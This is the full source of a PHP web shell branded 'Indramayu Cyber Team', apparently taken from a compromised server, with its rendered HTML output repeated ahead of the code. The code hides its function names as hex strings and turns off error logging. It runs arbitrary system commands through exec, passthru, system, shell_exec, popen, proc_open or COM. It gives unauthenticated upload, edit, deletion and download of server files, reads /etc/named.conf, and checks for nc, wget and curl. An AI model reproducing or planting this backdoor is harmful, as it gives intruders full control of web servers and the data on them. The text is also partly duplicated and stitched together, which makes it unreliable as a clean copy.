													<td><?= formatSize($func[10]($item)) ?></td>
													<td><?= $func[19](&quot;Y-m-d h:i:s&quot;, $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#renameModal&quot; data-bs-name=&quot;<?= $item ?>&quot;><i class=&quot;fa fa-edit&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#viewModal&quot; data-bs-name=&quot;<?= $item ?>&quot; data-bs-content=&quot;<?= $func[18](@$func[14]($item)) ?>&quot;><i class=&quot;fa fa-file-signature&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#downloadModal&quot; data-bs-file=&quot;<?= $dir . '/' . $item ?>&quot;><i class=&quot;fa fa-download&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#deleteModal&quot; data-bs-file=&quot;<?= $dir . '/' . $item ?>&quot;><i class=&quot;fa fa-trash-alt&quot;></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
										</tbody>
									</table>
								</div>
							<?php else: ?>
								<font class=&quot;text-danger&quot;>Can't read this directory!</font>
							<?php endif; ?>
						<?php endif; ?>
					</div>
				</div>
			</div>
			<div class=&quot;col-md-12 my-3&quot;>
				<div class=&quot;card border-dark&quot;>
					<div class=&quot;card-body&quot;>
						Copyright © <a href=&quot;https://imcyber-team.blogspot.com/&quot;><font size=&quot;1&quot;><b>INDRAMAYU CYBER TEAM</b></font></a> <span class=&quot;float-end&quot;>Coded by <span class=&quot;text-muted&quot;>./sTory An9el </span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;renameModal&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot; aria-labelledby=&quot;renameModalLabel&quot; aria-hidden=&quot;true&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;renameModalLabel&quot;>Rename</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <form method=&quot;post&quot; id=&quot;rename-form&quot;>
		      <div class=&quot;modal-body&quot;>
		          <div class=&quot;mb-3&quot;>
		            <label for=&quot;newname&quot; class=&quot;col-form-label&quot;>New Name:</label>
		            <input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;newname&quot; id=&quot;newname&quot;>
		          </div>
		      </div>
		      <div class=&quot;modal-footer&quot;>
		        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
		        <button type=&quot;submit&quot; class=&quot;btn btn-primary&quot;>Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;deleteModal&quot; aria-hidden=&quot;true&quot; aria-labelledby=&quot;deleteModalToggleLabel2&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;exampleModalToggleLabel2&quot;>Delete</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <div class=&quot;modal-body&quot;>
	        Are you sure want to delete this?
	      </div>
	      <div class=&quot;modal-footer&quot;>
	        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
	        <a href=&quot;&quot; class=&quot;btn btn-danger&quot; id=&quot;delete-confirm&quot;>Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;downloadModal&quot; aria-hidden=&quot;true&quot; aria-labelledby=&quot;deleteModalToggleLabel2&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;exampleModalToggleLabel2&quot;>Download</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <div class=&quot;modal-body&quot;>
	        Are you sure want to download this?
	      </div>
	      <div class=&quot;modal-footer&quot;>
	        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
	        <a href=&quot;&quot; class=&quot;btn btn-danger&quot; id=&quot;download-confirm&quot;>Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;viewModal&quot; aria-hidden=&quot;true&quot; aria-labelledby=&quot;deleteModalToggleLabel2&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;exampleModalToggleLabel2&quot;>View</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <form action=&quot;&quot; method=&quot;post&quot;>
		      <div class=&quot;modal-body&quot;>
		        <div class=&quot;mb-3&quot;>
	            <label for=&quot;content&quot; class=&quot;col-form-label&quot;>Content:</label>
	            <textarea class=&quot;form-control&quot; id=&quot;content&quot; rows=&quot;15&quot; name=&quot;content&quot;></textarea>
	          </div>
		      </div>
		      <div class=&quot;modal-footer&quot;>
		        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
		        <button type=&quot;submit&quot; class=&quot;btn btn-primary&quot;>Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src=&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js&quot; integrity=&quot;sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4&quot; crossorigin=&quot;anonymous&quot;></script>
	<script src=&quot;https://code.jquery.com/jquery-3.6.0.min.js&quot; integrity=&quot;sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=&quot; crossorigin=&quot;anonymous&quot;></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var deleteModal = document.getElementById('deleteModal')
		var viewModal = document.getElementById('viewModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = &quot;hidden&quot;;
			hiddenInput.value = name;
			hiddenInput.name = &quot;oldname&quot;;
			document.getElementById(&quot;rename-form&quot;).appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&amp;do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = '?dir=' + file + '&amp;do=download'
		})
		
		viewModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var content = button.getAttribute('data-bs-content')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = viewModal.querySelector('.modal-title')
			var modalContent = viewModal.querySelector('.modal-body textarea')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = &quot;hidden&quot;;
			hiddenInput.value = name;
			hiddenInput.name = &quot;filename&quot;;
			viewModal.querySelector(&quot;form&quot;).appendChild(hiddenInput);

			modalTitle.textContent = 'Edit ' + name
			modalContent.value = content
		})
	</script>
</body>
</html>

"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="/var/www/html/index.php"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="/var/www/html/index.php"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																					</tbody>
									</table>
								</div>
																		</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						Copyright © <a href="https://imcyber-team.blogspot.com/"><font size="1"><b>INDRAMAYU CYBER TEAM</b></font></a> <span class="float-end">Coded by <span class="text-muted">./sTory An9el </span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="modal fade" id="renameModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="renameModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Rename</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="rename-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newname" class="col-form-label">New Name:</label>
		            <input type="text" class="form-control" name="newname" id="newname">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="deleteModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Delete</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to delete this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="delete-confirm">Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="downloadModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Download</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to download this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="download-confirm">Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="viewModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">View</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form action="" method="post">
		      <div class="modal-body">
		        <div class="mb-3">
	            <label for="content" class="col-form-label">Content:</label>
	            <textarea class="form-control" id="content" rows="15" name="content"></textarea>
	          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4" crossorigin="anonymous"></script>
	<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var deleteModal = document.getElementById('deleteModal')
		var viewModal = document.getElementById('viewModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "oldname";
			document.getElementById("rename-form").appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = '?dir=' + file + '&do=download'
		})
		
		viewModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var content = button.getAttribute('data-bs-content')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = viewModal.querySelector('.modal-title')
			var modalContent = viewModal.querySelector('.modal-body textarea')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "filename";
			viewModal.querySelector("form").appendChild(hiddenInput);

			modalTitle.textContent = 'Edit ' + name
			modalContent.value = content
		})
	</script>



</body></html>

Original PHP code

<?php

$shellName = 'Indramayu Cyber Team';
$logo = 'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg';
$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65", "7363616e646972", "73797374656d", "65786563", "7061737374687275", "7368656c6c5f65786563", "6f625f6765745f636f6e74656e7473", "6f625f656e645f636c65616e", "6469726e616d65", "6469736b5f746f74616c5f7370616365", "6469736b5f667265655f7370616365", "696e695f676574", "707265675f6d617463685f616c6c", "706f7369785f6765747077756964", "706f7369785f6765746772676964", "70617468696e666f", "66696c656f776e6572", "66696c6567726f7570", "66696c6574797065", "676574486f73744e616d65", "676574486f737442794e616d65", "737562737472", "737472737472", "696e695f736574", "66696c65", "7374725f7265706c616365", "6578706c6f6465", "6576616c", "6f625f7374617274", "66756e6374696f6e5f657869737473", "6572726f725f7265706f7274696e67", "7365745f74696d655f6c696d6974", "636c656172737461746361636865", "646174655f64656661756c745f74696d657a6f6e655f736574", "666c757368", "7374726c656e", "7472696d", "656d707479", "6973736574", "66696c657065726d73", "7374726c656e", "636f756e74", "726f756e64", "6d696d655f636f6e74656e745f74797065", "6765745f63757272656e745f75736572", "6765746d79756964", "6765746d79676964", "706f7369785f67657465756964", "706f7369785f67657465676964"];

for ($i = 0; $i < count($func); $i++) {
	$func[$i] = dehex($func[$i]);
}

session_start();
$func[50](0);
@$func[51](0);
@$func[52]();
@$func[43]('error_log', null);
@$func[43]('log_errors',0);
@$func[43]('max_execution_time',0);
@$func[43]('output_buffering',0);
@$func[43]('display_errors', 0);
$func[53]("Asia/Jakarta");

if (isset($_GET['dir'])) {
	$dir = $_GET['dir'];
	$func[3]($dir);
} else {
	$dir = $func[2]();
}
	
$d0mains = @$func[44]("/etc/named.conf", false);
if (!$d0mains) {
	$dom = "<font class='text-danger'>Can't Read /etc/named.conf</font>";
} else { 
	$count = 0;
	foreach ($d0mains as $d0main) {
		if (@$func[43]($d0main, "zone")) {
			$func[32]('#zone "(.*)"#', $d0main, $domains);
			$func[54]();
			if ($func[55]($func[56]($domains[1][0])) > 2){
				$func[54]();
				$count++;
			}
		}
	}
	$dom = "<font class='text-success'>$count Domain</font>";
}

$dir = $func[45]("\\", "/", $dir);
$scdir = $func[46]("/", $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers =  (int) ($free / $total * 100);
$ds = @$func[31]("disable_functions");
$show_ds = (!empty($ds)) ? "<font class='text-danger'>$ds</font>" : "<font class='text-success'>All function is accessible</font>";

$cmd_uname = exe("uname -a");
$uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');

if (strtolower($func[41](PHP_OS, 0, 3)) == "win") {
	$sys = "win";
} else {
	$sys = "unix";
}

if (isset($_GET['do'])) {
	$do = $_GET['do'];
	if ($do == 'delete') {
		if ($func[12]($dir)) {
			if (deleter($dir)) {
				flash("File/Folder deleted successfully!", "Success", "success", "?dir=" . dirname($dir));
			} else {
				flash("File/Folder failed to delete!", "Failed", "danger");
			}
		} else {
			flash("File/Folder is doesn't exist!", "Failed", "warning");
		}
	} else if ($do == 'download') {
		if ($func[12]($dir)) {
			header("Content-Type: application/octet-stream");
			header("Content-Transfer-Encoding: Binary");
			header("Content-Length: " . $func[10]($dir));
			header("Content-disposition: attachment; filename=\"".basename($dir)."\"");
		} else {
			flash("File is doesn't exist!", "Failed", "warning");
		}
	}
} else {
	$do = 'filesman';
	$title = 'Files Manager';
	$icon = 'archive';
}

((isset($_POST["foldername"])) ? ($func[12]("$dir/{$_POST['foldername']}") ? flash("Folder name is exist!", "Failed", "warning") : ($func[15]("$dir/{$_POST['foldername']}") ? flash("Folder created successfully!", "Success", "success") : flash("Folder failed to create!", "Failed", "danger"))) : null);

((isset($_POST["filename"]) && isset($_POST['filecontent'])) ? ($func[12]("$dir/{$_POST['filename']}") ? flash("File name is exist!", "Failed", "warning") : ($func[13]("$dir/{$_POST['filename']}", $_POST['filecontent']) ? flash("File created successfully!", "Success", "success") : flash("File failed to create!", "Failed", "danger"))) : null);

((isset($_POST["newname"]) && isset($_POST['oldname'])) ? ($func[12]("$dir/{$_POST['newname']}") ? flash("File/Folder name is exist!", "Failed", "warning") : ($func[16]("$dir/{$_POST['oldname']}", $_POST['newname']) ? flash("File/Folder renamed successfully!", "Success", "success") : flash("File/Folder failed to rename!", "Failed", "danger"))) : null);

((isset($_POST["filename"]) && isset($_POST['content'])) ? ($func[13]("$dir/{$_POST['filename']}", $_POST['content']) ? flash("File saved successfully!", "Success", "success") : flash("File failed to save!", "Failed", "danger")) : null);

if (isset($_FILES["uploadfile"])) {
	$n = $_FILES["uploadfile"]["name"];
	for ($i = 0; $i < count($n); $i++) {
		if ($func[11]($_FILES["uploadfile"]["tmp_name"][$i], $n[$i])) {
			flash("File uploaded successfully!", "Success", "success");
		} else {
			flash("File failed to upload!", "Failed", "danger");
		}
	}
}

if (@$func[31]('open_basedir')) {
	$basedir_data = @$func[31]('open_basedir');
	if ($func[55]($basedir_data) > 120){
		$open_b = "<font class='text-success'>" . $func[41]($basedir_data, 0, 120) . "...</font>";
	} else {
		$open_b = '<font class="text-success">' . $basedir_data . '</font>';
	}
} else {
	$open_b = '<font class="text-warning">NONE</font>';
}

if (!$func[49]('posix_getegid')) {
	$user = $func[49]("get_current_user") ? @$func[64]() : "????";
	$uid = $func[49]("getmyuid") ? @$func[65]() : "????";
	$gid = $func[49]("getmygid") ? @$func[66]() : "????";
	$group = "?";
} else {
	$uid = $func[49]("posix_getpwuid") && $func[49]("posix_geteuid") ? @$func[33]($func[67]()) : ["name" => "????", "uid" => "????"];
	$gid = $func[49]("posix_getgrgid") && $func[49]("posix_getegid") ? @$func[34]($func[68]()) : ["name" => "????", "gid" => "????"];
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}

if ($sys == 'unix') {
	if (!@$func[31]('safe_mode')) {
		if ($func[55](exe("id")) > 0) {
			$userful = ['gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl'];
			$x = 0;
			foreach ($userful as $i) {
				if (which($i)) {
					$x++;
					$useful .= $i . ', ';
				}
			}
			if ($x == 0) {
				$useful = '--------';
			}
			$downloaders = ['wget','fetch','lynx','links','curl','get','lwp-mirror'];
			$x = 0;
			foreach($downloaders as $i) {
				if (which($i)) {
					$x++;
					$downloader .= $i . ', ';
				}
			}
			if ($x == 0) {
				$downloader = '--------';
			}
		}
	}
}

function hex($str) {
	global $func;
	$r = "";
	for ($i = 0; $i < $func[55]($str); $i++) {
		$r .= dechex(ord($str[$i]));
	}
	return $r;
}

function dehex($str) {
	$r = "";
	$len = (strlen($str) - 1);
	for ($i = 0; $i < $len; $i += 2) {
		$r .= chr(hexdec($str[$i].$str[$i + 1]));
	}
	return $r;
}

function formatSize($bytes) {
	$types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
	for ( $i = 0; $bytes >= 1024 && $i < ( count( $types ) - 1 ); $bytes /= 1024, $i++ );
	return( round( $bytes, 2 )." ".$types[$i] );
}

function perms($file) {
	global $func;
	$perms = fileperms($file);
	if (($perms & 0xC000) == 0xC000){
		$info = 's';
	}elseif (($perms & 0xA000) == 0xA000){
		$info = 'l';
	}elseif (($perms & 0x8000) == 0x8000){
		$info = '-';
	}elseif (($perms & 0x6000) == 0x6000){
		$info = 'b';
	}elseif (($perms & 0x4000) == 0x4000){
		$info = 'd';
	}elseif (($perms & 0x2000) == 0x2000){
		$info = 'c';
	}elseif (($perms & 0x1000) == 0x1000){
	$info = 'p';
	}else{
		$info = 'u';
	}
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));
	return $func[41](sprintf('%o', $perms), -4) . ' >> ' .$info;
}

function exe($in) {
	global $func;
	$out = '';
	try {
		if ($func[49]('exec')) {
			@$func[23]($in, $out);
			$out = @join("\n", $out);
		} elseif ($func[49]('passthru')) {
			$func[48]();
			@passthru($in);
			$out = $func[27]();
		} elseif($func[49]('system')) {
			$func[48]();
			@system($in);
			$out = $func[27]();
		} elseif ($func[49]('shell_exec')) {
			$out = $func[25]($in);
		} elseif ($func[49]("popen") && $func[49]("pclose")) {
			if (is_resource($f = @popen($in,"r"))) {
				$out = "";
				while(!@feof($f))
				$out .= fread($f, 1024);
				pclose($f);
			}
		} elseif ($func[49]('proc_open')) {
			$pipes = [];
			$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
			$out = @stream_get_contents($pipes[1]);
		} elseif (class_exists('COM')) {
			$ws = new COM('WScript.shell');
			$exec = $ws->exec('cmd.exe /c '.$in);
			$stdout = $exec->StdOut();
			$out = $stdout->ReadAll();
		}
	} catch(Exception $e) {}
	return $out;
}

function checkName($name) {
	global $func;
	if ($func[55]($name) > 18) {
		return $func[41]($name, 0, 18) . "...";
	}
	return $name;
}

function checkPerm($dir, $perm) {
	global $func;
	$perm = explode('>>', $perm);
	if ($func[8]($dir)) {
		return "<font class='text-success'>".$perm[0]."</font> >> <font class='text-success'>".$perm[1]."</font>";
	} elseif (!$func[9]($dir)) {
		return "<font class='text-danger'>".$perm[0]."</font> >> <font class='text-danger'>".$perm[1]."</font>";
	} else {
		return "<font class='text-secondary'>".$perm[0]."</font> >> <font class='text-secondary'>".$perm[1]."</font>";
	}
}

function getowner($item) {
	global $func;
	if ($func[49]("posix_getpwuid")) {
		$downer = @$func[33](fileowner($item));
		$downer = $downer['name'];
	} else {
		$downer = fileowner($item);
	}
	if ($func[49]("posix_getgrgid")) {
		$dgrp = @$func[34](filegroup($item));
		$dgrp = $dgrp['name'];
	} else {
		$dgrp = filegroup($item);
	}
	return $downer . '/' . $dgrp;
}

function geticon($file) {
	global $func;
	$ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
	if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') {
		return 'file-code';
	} else if ($ext == 'pdf') {
		return 'file-pdf';
	} else if ($ext == 'txt') {
		return 'file-alt';
	} else if ($ext == 'csv') {
		return 'file-csv';
	} else if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') {
		return 'file-image';
	} else if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') {
		return 'file-video';
	} else if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') {
		return 'file-word';
	} else if ($ext == 'ppt' || $ext == 'pptx') {
		return 'file-powerpoint';
	} else if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') {
		return 'file-excel';
	} else if ($ext == 'mp3' || $ext == 'wav') {
		return 'file-audio';
	} else if ($ext == 'sql' || $ext == 'db') {
		return 'database';
	} else if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') {
		return 'file-archive';
	} else {
		return 'file';
	}
}

function which($p) {
	global $func;
	$path = exe('which ' . $p);
	if (!empty($path)) {
		return $func[55]($path);
	}
	return false;
}

function flash($message, $status, $class, $redirect = false) {
	if (!empty($_SESSION["message"])) {
		unset($_SESSION["message"]);
	}
	if (!empty($_SESSION["class"])) {
		unset($_SESSION["class"]);
	}
	if (!empty($_SESSION["status"])) {
		unset($_SESSION["status"]);
	}
	$_SESSION["message"] = $message;
	$_SESSION["class"] = $class;
	$_SESSION["status"] = $status;
	if ($redirect) {
		header('Location: ' . $redirect);
		exit();
	}
	return true;
}

function clear() {
	if (!empty($_SESSION["message"])) {
		unset($_SESSION["message"]);
	}
	if (!empty($_SESSION["class"])) {
		unset($_SESSION["class"]);
	}
	if (!empty($_SESSION["status"])) {
		unset($_SESSION["status"]);
	}
	return true;
}

function deleter($d) {
	global $func;
	if (trim($func[35]($d, PATHINFO_BASENAME), '.') === '') {
		return false;
	};
	if ($func[6]($d)) {
		array_map("deleter", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
		rmdir($d);
		return true;
	} else {
		unlink($d);
		return true;
	}
	return false;
}

$scandir = $func[21]($dir);

?>
<!doctype html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
	<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
	<title><?= $shellName ?></title>
</head>
<body>
	<div class="container-lg">
		
		<nav class="navbar navbar-light bg-light">
			<div class="container-fluid">
				<a class="navbar-brand" href="?">
					<img src="<?= $logo ?>" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
					<?= $shellName ?>
				</a>
			</div>
		</nav>
		
		<?php if (isset($_SESSION['message'])) : ?>
		<div class="alert alert-<?= $_SESSION['class'] ?> alert-dismissible fade show my-3" role="alert">
			<strong><?= $_SESSION['status'] ?>!</strong> <?= $_SESSION['message'] ?>
			<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
		</div>
		<?php endif; clear(); ?>

		<div id="tool">
			<div class="d-flex justify-content-center flex-wrap my-3">
